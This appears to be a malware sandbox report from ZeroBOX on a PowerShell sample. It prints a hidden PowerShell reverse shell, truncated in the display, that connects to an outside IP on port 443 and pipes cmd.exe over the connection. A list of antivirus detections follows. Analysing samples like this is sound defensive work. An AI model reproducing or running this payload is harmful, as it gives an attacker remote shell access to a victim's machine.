Static | ZeroBOX
No static analysis available.
powershell -w hidden -nop -c $a='191.232.181.180';$b=443;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Resul
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Boxter.m!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 PowerShell/ReverseShell.BD
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Backdoor.PowerShell.Agent.gen
BitDefender Heur.BZC.PZQ.Boxter.651.469FE5E7
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.651.469FE5E7
Tencent Win32.Backdoor.Agent.Dwnw
Sophos Clean
F-Secure Exploit.EXP/YAV.Minerva.ixkxg
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.651.469FE5E7
TrendMicro Clean
FireEye Heur.BZC.PZQ.Boxter.651.469FE5E7
Emsisoft Heur.BZC.PZQ.Boxter.651.469FE5E7 (B)
GData Heur.BZC.PZQ.Boxter.651.469FE5E7
Jiangmin Clean
Varist ABRisk.ZIGD-6
Avira EXP/YAV.Minerva.ixkxg
MAX malware (ai score=89)
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.651.469FE5E7
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.PowerShell.Agent.gen
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan.Script
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Backdoor:Win/ReverseShell.BF
No IRMA results available.